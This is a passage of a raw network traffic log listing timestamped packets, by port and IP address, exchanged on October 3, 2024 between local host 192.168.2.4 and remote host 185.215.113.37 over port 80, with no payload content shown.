Oct 3, 2024 18:38:22.112948895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.112976074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.112983942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.113003016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.113019943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.113044024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.113135099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.113941908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.113976002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114007950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114041090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114042044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114042044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114065886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114074945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114109039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114142895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114171028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114203930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114228010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114228010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114238024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114295959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114295959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114350080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114387989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114419937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114449978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114475965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114490986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114511013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114542961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114633083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114665985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114681005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114697933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114700079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114733934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114749908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114749908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114767075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114800930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.114856005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.114856005 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115255117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115309000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115341902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115343094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115375996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115408897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115432024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115432024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115441084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115473986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115498066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115506887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115540028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115546942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115572929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115591049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115607977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115628004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115628004 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115643024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115675926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115684032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115709066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.115730047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.115875006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.116847038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.116879940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.116914034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.116931915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.116931915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.116949081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.116981983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117013931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117044926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117054939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117070913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117079020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117111921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117121935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117121935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117146969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117177963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117211103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117223024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117233038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117244005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117300034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117300034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117667913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117700100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117732048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117764950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117779970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117779970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117798090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117832899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117865086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117898941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117923975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117923975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.117933035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117966890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.117999077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118006945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118006945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118031979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118045092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118045092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118066072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118347883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118462086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118495941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118527889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118567944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118567944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118578911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118622065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118627071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118657112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118689060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118690968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118690968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118722916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118733883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118733883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118756056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118793964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118824959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118825912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118844986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118860960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118895054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.118915081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.118915081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.119349957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.119849920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.119872093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.119889975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.119908094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.119931936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.119968891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.190903902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191044092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191152096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191186905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191220999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191252947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191272020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191298008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191303968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191339016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191348076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191374063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191411018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191452980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191708088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191741943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191775084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191807985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191818953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191818953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191842079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191876888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.191899061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.191899061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192049980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192112923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192150116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192182064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192214966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192234039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192234039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192248106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192281961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192300081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192300081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192810059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192845106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192853928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192873001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192878962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192914963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192929983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192929983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.192950010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.192982912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.193016052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.193053007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.193085909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.193140030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.207928896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.207959890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.207976103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.208019018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.208019018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.208554029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.208570004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.208585024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.208599091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.208614111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.208642006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.208673954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.212151051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.212167978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.212182999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.212199926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.212215900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.212229013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.212243080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.212259054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.212260008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.212276936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.212322950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.284415007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.289328098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505367994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505409956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505459070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505491018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505523920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505527973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505527973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505556107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505565882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505585909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505592108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505616903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505661011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505675077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505727053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505759001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505790949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505800962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505800962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505826950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.505858898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.505947113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506136894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506169081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506201982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506232023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506258011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506264925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506295919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506330013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506335974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506335974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506364107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506473064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506505966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506531954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506531954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506539106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506572962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506604910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506638050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506660938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506660938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506670952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506697893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506891012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.506943941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.506943941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507005930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507039070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507086992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507119894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507152081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507172108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507172108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507184982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507217884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507291079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507561922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507594109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507627964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507647038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507647038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507658958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507692099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507724047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507724047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507724047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507761955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507775068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507775068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507795095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507833958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.507846117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.507846117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508166075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508215904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508248091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508268118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508268118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508280039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508313894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508315086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508347988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508380890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508400917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508400917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508411884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508441925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508445978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508477926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508479118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508526087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508526087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508527994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508585930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.508975983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.508991003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509005070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509020090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509035110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509048939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509063959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509073019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.509073019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.509079933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509095907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509110928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509143114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.509143114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.509191036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:22.509706974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509721994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:22.509737015 CEST	80	49730	185.215.113.37	192.168.2.4
